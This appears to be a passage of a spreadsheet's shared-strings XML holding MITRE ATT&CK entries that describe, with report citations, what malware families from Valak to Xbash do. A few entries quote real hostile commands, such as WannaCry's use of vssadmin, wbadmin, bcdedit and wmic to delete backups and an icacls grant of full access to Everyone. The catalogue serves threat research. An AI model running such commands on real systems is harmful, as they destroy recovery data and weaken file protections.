  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use a .NET compiled module named exchgrabber to enumerate credentials from the Credential Manager.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) can use &lt;code&gt;wmic process call create&lt;/code&gt; in a scheduled task to launch plugins and for execution.(Citation: SentinelOne Valak June 2020)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) can download files.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) is capable of tunneling though a proxy.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) copies itself to disk and creates an associated run key Registry entry to establish.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) creates a backdoor by making a connection using a HTTP POST.(Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>Some [Volgmer](https://attack.mitre.org/software/S0180) variants use SSL to encrypt C2 communications.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) deobfuscates its strings and APIs once its executed.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can delete files and itself after infection to avoid analysis.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can list directories on a victim.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can download remote files and additional payloads to the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>Some [Volgmer](https://attack.mitre.org/software/S0180) variants add new services with display names generated by a list of hard-coded strings such as Application, Background, Security, and Windows, presumably as a way to masquerade as a legitimate service.(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) stores the encoded configuration file in the Registry key &lt;code&gt;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Security&lt;/code&gt;.(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) executes payloads using the Windows API call CreateProcessW().(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>A [Volgmer](https://attack.mitre.org/software/S0180) variant is encoded using a simple XOR cipher.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather a list of processes.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) checks the system for certain Registry keys.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) uses a simple XOR cipher to encrypt traffic and files.(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather system information, the computer name, OS version, drive and serial information from the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather the IP address from the victim's machine.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can gather information about TCP connection state.(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) queries the system to identify existing services.(Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) can execute commands on the victim's machine.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) installs a copy of itself in a randomly selected service, then overwrites the ServiceDLL entry in the service's Registry entry. Some [Volgmer](https://attack.mitre.org/software/S0180) variants also install .dll files as services with names generated by a list of hard-coded strings.(Citation: US-CERT Volgmer Nov 2017)(Citation: US-CERT Volgmer 2 Nov 2017)(Citation: Symantec Volgmer Aug 2014)</t>
  </si>
  <si>
    <t>Variants of [WEBC2](https://attack.mitre.org/software/S0109) achieve persistence by using DLL search order hijacking, usually by copying the DLL file to &lt;code&gt;%SYSTEMROOT%&lt;/code&gt; (&lt;code&gt;C:\WINDOWS\ntshrui.dll&lt;/code&gt;).(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) can download and execute a file.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) can open an interactive command shell.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) is capable of file deletion along with other file system interaction.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) C2 traffic can communicate via TCP raw sockets.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather Registry values.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather the victim computer name.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) can gather the victim user name.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate active windows.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate files and directories.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate processes.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can gather information about the host.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can gather information on the victim username.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) can enumerate services.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses [Tor](https://attack.mitre.org/software/S0183) for command and control traffic and routes a custom cryptographic protocol over the [Tor](https://attack.mitre.org/software/S0183) circuit.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) encrypts user files and demands that a ransom be paid in Bitcoin to decrypt those files.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses an exploit in SMBv1 to spread itself to other remote systems on a network.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: US-CERT WannaCry 2017)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) searches for variety of user files by file extension before encrypting them using RSA and AES, including Office, PDF, image, audio, video, source code, archive/compression format, and key and certificate files.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;attrib +h&lt;/code&gt; to make some of its files hidden.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;vssadmin&lt;/code&gt;, &lt;code&gt;wbadmin&lt;/code&gt;, &lt;code&gt;bcdedit&lt;/code&gt;, and &lt;code&gt;wmic&lt;/code&gt; to delete and disable operating system recovery features.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) attempts to copy itself to remote computers after gaining access via an SMB exploit.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses [Tor](https://attack.mitre.org/software/S0183) for command and control traffic.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) contains a thread that will attempt to scan for new attached drives every few seconds. If one is identified, it will encrypt the files on the attached device.(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) enumerates current remote desktop sessions and tries to execute the malware on each session.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) scans its local network segment for remote systems to try to exploit and copy itself to.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores.(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) will attempt to determine the local network segment it is a part of.(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) uses &lt;code&gt;attrib +h&lt;/code&gt; and &lt;code&gt;icacls . /grant Everyone:F /T /C /Q&lt;/code&gt; to make some of its files hidden and grant all users full access controls.(Citation: LogRhythm WannaCry)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) utilizes &lt;code&gt;wmic&lt;/code&gt; to delete shadow copies.(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)(Citation: SecureWorks WannaCry Analysis)</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) creates the service "mssecsvc2.0" with the display name "Microsoft Security Center (2.0) Service."(Citation: LogRhythm WannaCry)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[Waterbear](https://attack.mitre.org/software/S0579) has used DLL side loading to import and load a malicious DLL loader.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) has the ability to decrypt its RC4 encrypted payload for execution.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can hook the &lt;code&gt;ZwOpenProcess&lt;/code&gt; and &lt;code&gt;GetExtendedTcpTable&lt;/code&gt; APIs called by the process of a security product to hide PIDs and TCP records from detection.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can scramble functions not to be executed again with random values.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can receive and load executables from remote C2 servers.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can leverage API functions for execution.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) has used RC4 encrypted shellcode.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can identify the process for a specific security product.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can inject decrypted shellcode into the LanmanServer service.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can query the Registry to retrieve data.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can find the presence of a specific security software.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Waterbear](https://attack.mitre.org/software/S0579) can use API hooks on "GetExtendedTcpTable" to retrieve a table containing a list of TCP endpoints available to the application.(Citation: Trend Micro Waterbear December 2019) </t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) can use thread injection to inject shellcode into the process of security software.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can archive files on the compromised host.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can exfiltrate files from the victim machine.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can decompress scripts received from C2.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can receive data and executable scripts from C2.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can use TCP for C2 communications.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) has been observed using TCP port 25, without using SMTP, to leverage an open port for secure command and control communications.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can identify the IP address of the victim system.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) can identify the current username on the victim system.(Citation: CISA WellMail July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can communicate to C2 with mutual TLS where client and server mutually check certificates.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) has the ability to use DNS tunneling for C2 communications.(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can send files from the victim machine to C2.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can decode and decrypt data received from C2.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify domain group membership for the current user.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can write files to a compromised host.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can use junk data in the Base64 string for additional obfuscation.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can execute PowerShell scripts received from C2.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) has used Base64 encoding to uniquely identify communication to and from the C2.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can encrypt HTTP POST data using RC6 and a dynamically generated AES key encrypted with a hard coded RSA public key.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify the computer name of a compromised host.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can identify the IP address and user domain on the target machine.(Citation: PWC WellMess July 2020)(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can collect the username on the victim machine to send to C2.(Citation: CISA WellMess July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can use HTTP and HTTPS in C2 communications.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) can execute command line scripts received from C2.(Citation: PWC WellMess July 2020)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can download files.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can inject files into running processes.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can open a command line interface.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) creates a backdoor through which remote attackers can create a service.(Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) is usually configured with primary and backup domains for C2 communications.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) sets a WH_CBT Windows hook to search for and capture files on the victim.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) sets a WH_CBT Windows hook to collect information on process creation.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) collects the system name, OS version including service pack, and system install date and sends the information to the C2 server.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) uses NetUser-GetInfo to identify that it is running under an “Admin” account on the local system.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) uses HTTP for C2.(Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to use the macOS built-in zip utility to archive files.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can identify and add files that possess specific file extensions to an array for archiving.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to decrypt strings using hard-coded AES keys.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to automatically exfiltrate files using the macOS built-in utility /usr/bin/curl.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to receive and execute a self-delete command.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to enumerate the users home directory and the path to its own application bundle.(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can instruct the OS to execute an application without a dock icon or menu.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has been incompletely signed with revoked certificates.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has used icons mimicking MS Office files to mask payloads.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can invoke Apple APIs &lt;code&gt;contentsOfDirectoryAtPath&lt;/code&gt;, &lt;code&gt;pathExtension&lt;/code&gt;, and (string) &lt;code&gt;compare&lt;/code&gt;.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can be delivered as a compressed, encrypted, and encoded payload.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to generate the current date and time.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) can use the &lt;code&gt;open&lt;/code&gt; command to execute an application.(Citation: objective-see windtail1 dec 2018)</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) has the ability to use HTTP for C2 communications.(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>[Windows Credential Editor](https://attack.mitre.org/software/S0005) can dump credentials.(Citation: Amplia WCE)</t>
  </si>
  <si>
    <t>[Winexe](https://attack.mitre.org/software/S0191) installs a service on the remote system, executes the command, then uninstalls the service.(Citation: Secpod Winexe June 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) exploits CVE-2016-4117 to allow an executable to gain escalated privileges.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) deletes its payload along with the payload's parent process after it finishes copying files.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) drops a malicious file (sspisrv.dll) alongside a copy of lsass.exe, which is used to register a service that loads sspisrv.dll as a driver. The payload of the malicious driver (located in its entry-point function) is executed when loaded by lsass.exe before the spoofed service becomes unstable and crashes.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) performs multiple process injections to hijack system processes and execute malicious code.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) checks for the presence of Bitdefender security software.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) uses services.exe to register a new autostart service named "Audit Service" using a copy of the local lsass.exe file.(Citation: Microsoft SIR Vol 21)(Citation: Microsoft Wingbird Nov 2017)</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.(Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has decoded XOR encoded strings holding its configuration upon execution.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has the ability to deploy modules directly from command and control (C2) servers, possibly for remote command execution, file exfiltration, and socks5 proxying on the infected host. (Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used ICMP, custom TCP, and UDP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) can encode its configuration file with single-byte XOR encoding.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a modified copy of the open-source userland rootkit Azazel, named libxselinux.so, to hide the malware's operations and network activity.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a custom TCP protocol with four-byte XOR for command and control (C2).(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a passive listener, capable of identifying a specific magic value before executing tasking, as a secondary command and control (C2) mechanism.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) has used HTTP in outbound communications.(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>A [Winnti for Windows](https://attack.mitre.org/software/S0141) implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.(Citation: Microsoft Winnti Jan 2017)</t>
  </si>
  <si>
    <t>The [Winnti for Windows](https://attack.mitre.org/software/S0141) installer loads a DLL using rundll32.(Citation: Microsoft Winnti Jan 2017)</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) sets its DLL file as a new service in the Registry to establish persistence.(Citation: Microsoft Winnti Jan 2017)</t>
  </si>
  <si>
    <t>It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the [Wiper](https://attack.mitre.org/software/S0041) malware.(Citation: Dell Wiper)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getFirefoxPassword function to attempt to locate Firefox passwords.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the deletFileFromPath function to delete a specified file using the NSFileManager:removeFileAtPath method.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the ftpUpload function to use the FTPManager:uploadFile method to upload files from the target system.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the readFiles function to return a detailed listing (sometimes recursive) of a specified directory.(Citation: XAgentOSX 2017) [XAgentOSX](https://attack.mitre.org/software/S0161) contains the showBackupIosFolder function to check for IOS device backups by running &lt;code&gt;ls -la ~/Library/Application\ Support/MobileSync/Backup/&lt;/code&gt;.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains keylogging functionality that will monitor for active application windows and write them to the log, it can handle special characters, and it will buffer by default 50 characters before sending them out over the C2 infrastructure.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the execFile function to execute a specified file on the system using the NSTask:launch method.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getProcessList function to run &lt;code&gt;ps aux&lt;/code&gt; to get running processes.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the takeScreenShot (along with startTakeScreenShot and stopTakeScreenShot) functions to take screenshots using the CGGetActiveDisplayList, CGDisplayCreateImage, and NSImage:initWithCGImage methods.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getInstalledAPP function to run &lt;code&gt;ls -la /Applications&lt;/code&gt; to gather what applications are installed.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) contains the getInfoOSX function to return the OS X version as well as the current user.(Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) uses SSL/TLS and RC4 to encrypt traffic.(Citation: Invincea XTunnel)(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>A version of [XTunnel](https://attack.mitre.org/software/S0117) introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) is capable of accessing locally stored passwords on victims.(Citation: Invincea XTunnel)</t>
  </si>
  <si>
    <t>The C2 server used by [XTunnel](https://attack.mitre.org/software/S0117) provides a port number to the victim to use as a fallback in case the connection closes on the currently used port.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) is capable of probing the network for open ports.(Citation: Invincea XTunnel)</t>
  </si>
  <si>
    <t>A version of [XTunnel](https://attack.mitre.org/software/S0117) introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) relays traffic between a C2 server and a victim.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) has been used to execute remote commands.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) can create a cronjob for persistence if it determines it is on a Linux system.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
